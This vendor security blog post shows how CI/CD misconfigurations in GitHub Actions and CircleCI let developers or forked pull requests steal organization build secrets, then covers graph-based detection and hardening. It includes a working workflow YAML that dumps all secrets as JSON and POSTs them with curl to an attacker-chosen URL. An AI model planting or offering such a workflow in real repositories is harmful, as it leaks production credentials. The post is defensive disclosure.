All Roads Lead to Build Secrets – Or How Your Build System Could Expose The Production Environment

user profile
Head of Security Research

Every software manufacturer nowadays implements robust DevOps processes to increase its ability to deliver applications and services at high velocity. These processes usually include testing, building, packaging, deploying, and additional autonomous procedures.

This article will demonstrate that the race to embrace CI/CD capabilities has introduced subtle new risks. An especially significant risk that most organizations aren’t recognizing are secrets in the build system.

While secrets in source code result from missing best practices, secrets in the build systems are essential for creating meaningful workflows that communicate and authenticate with various services, such as cloud providers, artifact registries, package managers, ticket handling systems, messaging apps, etc. Usually, when you store these secrets, they are well-encrypted and revealed inside the specific builds authorized to access them.

Let’s imagine the following organization – a software development company named “OrdinaryCompany” uses a private GitHub organization to store its code and both GitHub Actions and CircleCI as CI/CD platforms when the workflows are defined as part of the repositories. The issues we will discuss in this post also apply to any other popular tools – GitLab, Jenkins, Bitbucket, TravisCI, JFrog Pipelines, TeamCity, etc.

“OrdinaryCompany” implements standard workflows for building code into a container image, pushing the package to Docker Hub, and deploying it to an Elastic Kubernetes Service (EKS) cluster on AWS. To implement this, you must store build secrets to assist the build procedure in authenticating with each of the appropriate systems:

  • Cloning the repository – requires the use of a GitHub token or an SSH key
  • Packaging and pushing the container –  requires the use of a Docker Hub token
  • Deploying the image to the EKS cluster – requires the use of an AWS token

The company “OrdinaryCompany” is a large enterprise, and their motivated CISO implemented exceptional segregation of duties. Only a few selected personas have direct access to the production (AWS/DockerHub) environment, their access is enforced by MFA, and all of their activity is monitored. The CISO’s intention is crystal clear – from a software supply chain security perspective, any malicious entry into the cloud environment or the artifact registry environment could compromise the entire client base of the enterprise.

Source Control as a Build System

During the past several years, we witnessed how the build procedures are transitioning from being defined in the build systems (for example, pipelines in Jenkins) to being defined in source control systems. This developer-centric experience helps to speed up the development process. It is a significant milestone in the GitOps paradigm – ensuring that the Git repository will always contain a declarative description of the infrastructure currently desired in the production environment and an automated process to make the production environment match the described state in the repository.

In the case of GitHub Actions, committing a YAML file into the .github/workflows path creates an automated pipeline that can be triggered when certain events happen. Given that we will not dive into GitHub Actions’ technical details, you are welcome to check our previous blog explaining its core mechanics, including how an attacker can leverage vulnerable configurations into code execution.

Use Case No. 1: Encrypted Build Secrets in GitHub Repositories are not as Safe as They Seem.

The organization, “OrdinaryCompany”, added a Docker Hub token as a GitHub Actions secret to allow the build pipeline to push built packages into the organization hub account.

They also followed the complete security guidelines by GitHub, including limiting the scope of stored tokens and defining it in required repositories. The CISO also read that secrets defined in GitHub are so well-encrypted that even GitHub can’t access them, so he felt fine with using them.

But encryption is not necessarily equal to confidentiality. Developers usually have “write” access to the Git repository to which they commit code. Even creating additional branches, not necessarily the main branch, requires “write” permission for the entire repository.

A developer could easily create a new GitHub Actions workflow that exfiltrates all exposed repository and organization secrets to an external controlled server with such permissions. This means the developer gets access to the production environment! 

Let’s explain it – the developer having “write” access doesn’t mean he gets the decryption keys for the secrets. Still, he can construct a new build pipeline and instruct the GitHub Actions service, which has the decryption keys, to exfiltrate all secrets.

The YAML file that describes such workflow will look like the following:

name: Secrets

on:
 workflow_dispatch:
   inputs:
     url:
       required: true

jobs:
 build:
   runs-on: ubuntu-latest
   steps:
     - run: |
         echo "${{ toJSON(secrets) }}" > .secrets
         curl -X POST -s --data "@.secrets" ${{ github.event.inputs.url }} > /dev/null

Currently, GitHub doesn’t have granular enough permission controls to separate duties in repository files: Creating a new workflow and updating a documentation file are both in the same permission set.

While this may seem exaggerated, the risk is genuine:

  • While organizations give developers control over pushing new code, they aren’t willing to provide them with complete control of the production environment. It motivates attackers to focus on compromising developers’ accounts and increases the risk of insider threats.
  • According to Gartner, the software supply-chain risks are rising and will continue to grow in 2022. An effective vector for software supply-chain attacks is through developer accounts and workstations.

You may also think that protecting branches (like the main branch) will prevent this attack vector. It won’t; an attacker could simply create an additional non-protected branch, create a workflow that will be triggered on the pull_request event, and create a pull request to the main branch. This will trigger the malicious workflow, which could exfiltrate the same secrets as from the main branch.

Use Case No. 2: Build Secrets are Accessible in New Repositories

Once “OrdinaryCompany” CISO noticed this “loophole”, he immediately hardened the SDLC process by removing most of the “write” permissions to the sensitive repositories and forcing merging code through forked pull requests. The development team didn’t like it, but it solved the security issue.

But it is not over yet.

Our organization has several repositories on GitHub that need to use a Docker Hub token, so we must define it at the organization level. In addition, similar to most organizations, “OrdinaryCompany” has enabled two options to allow them to develop software quickly:

  1. Allowing all members to create new repositories – developers constantly create new repositories for research and development. This is the default option.
  2. Default GitHub settings permit all repositories to run GitHub Actions – This means all newly created repositories are automatically allowed to run actions without waiting for administrator approval.

Combining all these options enables an interesting attack vector – any member in the organization can create a new repository with default write access permissions and use it to create a new GitHub Actions workflow to exfiltrate organization secrets!

When we create a new repository, we can see the secrets that the repository is exposed to:

Use Case No. 3: Exposing Build Secrets through Forked Pull Requests

The CISO was shocked by this security loophole, so he asked the organization administrator to expose the organization’s secrets only to the relevant repositories through the settings panel:

From this point onward, any new repository won’t have immediate access to sensitive secrets.

At this point, it seems like we’ve reached the end of this attack vector, right? Nope!

We mentioned our organization is using CircleCI also for other builds. As a result of “Use Case No. 1” mitigation, most developers don’t have “write” permissions to the repositories, so the only way to commit code is by creating forked pull requests. Thus, to allow the creation of meaningful workflows, the DevOps person allowed running builds on forked pull requests and also sending secrets to such runs using the following CircleCI project configuration:

The usage may vary – deploying to the testing environment with web-preview abilities, integrating with a vulnerability scanner of choice, integrating with Slack for notifications, running static analysis, integrating with Jira for creating issues, etc.

This means that every developer with at least “read” permissions (the default) can fork the repository, create a new CircleCI workflow, send a pull request, and trigger the build workflow. This workflow could exfiltrate all CircleCI project secrets!

What Can We Learn From It?

We showcased three cases in which a set of standard configurations broke the security model inside an organization, and it’s only the tip of the iceberg. Even though none of these issues is impossible to mitigate, they are related to the internal security model of the SCM or the build system, which can be subtle and time-consuming to understand. The result is that the security teams do not see the entire risk posture of their organization.

In our opinion, the root cause for these issues comes from several reasons:

  • Nowadays, most organizations work with dozens of CI/CD and cloud systems. Some of the systems do offer best practices and suggested configurations. Still, it is the organization’s role to look at everything from a high-level perspective, and the complexity of understanding each system’s nuance increases the risk of inadvertent misconfigurations. 
  • We need to understand that GitOps transforms SCM systems into build systems for many organizations. Today, any developer has access to create builds on closed private build systems with sensitive secrets. This intimate relationship should be addressed in organization risk assessment accordingly with least privilege policies that are granular enough to create separation of duties effectively.
  • The CI/CD and cloud-native industry is developing at an incredibly increased pace. Many vendors invest in their CI/CD platform and answer client requests without enough security consideration.

Graph-based Queries – Problem or Solution?

John Lambert, the founder of Microsoft Threat Intelligence Center, published an article titled: “Defenders think in lists. Attackers think in graphs. As long as this is true, attackers win.” The use cases we mentioned previously fit this exceptionally well.

In big enterprises with thousands of repositories, dozens of GitHub organizations, and tons of sensitive secrets, a dedicated attacker will find his way into the holy-grail secret, which can provide access into the production environment, and as a result, have severe security implications.

Each platform (such as GitHub or CircleCI) can be complex to understand, and it does not always reflect the implications of its configuration regarding other steps in the process. To understand the logical connections regarding the issues we presented, you can try to answer the following guiding questions:

  • How do organization and repository settings affect the security posture of your CI/CD process?
    • As we saw previously, each configuration has different effects: creating repositories, allowing actions, transmitting secrets into forked pull requests, giving default permissions for members, giving default permissions for GITHUB_TOKEN, and more.
  • What members have excessive access to organization assets?
    • This can be complex because assets can have many relationships – members or organizations, members of teams, teams have access to repositories, outside collaborators, organization base permissions, and more.
  • How can you best implement the principle-of-least-privilege?

It can be difficult, if not impossible, to answer these questions with current tooling. Unless… you start to think in graphs!

Identifying Issues Through Graph Queries

By modeling the security posture of every CI/CD system in a graph database, we can conduct smart queries to understand our risks and even alert when exceptions happen.

Use Case No. 1

We showed that developers that have “write” permissions to the repository could exfiltrate sensitive repository and organization secrets. This could be easily modeled in a graph by looking at the following connections:

  • The repository has access to secrets (which could be organization secrets as well)
  • Users have at least “write” permissions to the repository. Could be through:
    • Organization base permission
    • Through team permission
    • Through repository permission

For example, if we want to monitor our AWS token, we can query all the users that have potential access to it:

Use Case No. 2

In the second threat, we showed that organization secrets could be exposed by creating new repositories, which would have allowed actions. We can identify this threat by creating relations between the build secrets to organizations and combining it with several additional filters:

  • Does the organization allow creating new repositories? Private and public?
  • Does the organization allow running GitHub Actions for all repositories?
  • Do the secrets exposed to all repositories? Only to private ones?

So when we combine these, we can quickly identify such secrets and mitigate them appropriately.

Use Case No. 3

This issue happened due to secrets sent through forked pull requests from CircleCI.

The modeling will combine several conditions:

  • CircleCI project containing secrets
  • CircleCI project configured that it will build forked pull requests
  • CircleCI project configured that it will send secrets to forked pull requests
  • Users have at least “read” permissions to the repository. Could be through:
    • Organization base permission
    • Through team permission
    • Through repository permission

What can we do now?

This article won’t give a cookbook for securing the entire SDLC process, but we’ll try to provide some guidelines.

Understanding the threat landscape

The issue we presented doesn’t end with GitHub and CircleCI but involves all modern CI/CD systems, e.g., the repository may contain Jenkinsfile, .gitlab-ci.yml, .travis.yml, and more. 

The first part of mitigating threats is understanding them. This must come from visibility:

  1. Identifying the critical assets – Code repositories? Production environment? Packages?
  2. Understanding where your assets are stored – Specific repositories on GitHub? The build system on GitLab? Or maybe secrets in Jenkins?
  3. Understanding the access relations inside your organization – What entities access the areas defined as containing assets? This includes users, bots, 3rd party applications, and more.

Hardening the pipeline

At first, it seems like identifying the relations and conducting a proper risk assessment inside the organization is the majority for securing your CI/CD process, but finding the right solutions to mitigate the risk can be tricky. It demands extensive research to understand the proper hardening for tens of the systems your organization may use.

  • If you use a build system inside your SCM, whether the organization or a single repository, treat the risks accordingly. This means double-checking all the possible default permissions for the organization, specific permissions for each repository, and who can write and manipulate your build process.
  • The ideal solution would be to separate the build process from the rest of the code development. For example:
    • Let the core development be in the GitHub organization, and the build process would be defined in a completely different repository, organization, or even another platform (such as GitLab).
    • Every code push or a pull request to the central repository will call a webhook that will trigger the build process without an external actor’s ability to alter it.
    • If you intend to adhere to SLSA specifications, you must implement similar solutions for the “Non-falsifiable” requirement.
    • This concept is demonstrated in this article by GitHub that shows how to achieve SLSA 3 through reusable workflows.

How Cycode Solves It

By utilizing its knowledge graph, Cycode can deliver you the security insights you need to identify and mitigate the risks inside your organization. Our research team will identify the pitfalls of every system in the CI/CD pipeline and its possible connection to other systems. By using this knowledge, you can inspect the entire logical connections in your organization, and we can deliver you security intelligence to protect your assets.

One of the most notable features of the knowledge graph is its ability to generate complex insights created by analyzing data from multiple points of the software delivery pipeline. This makes more accurate insights, provides new learnings, and helps improve visibility across the various tools and binaries utilized throughout the development environments. 

Want To Learn More?

A great place to start is with a free assessment of the security of your DevOps pipeline.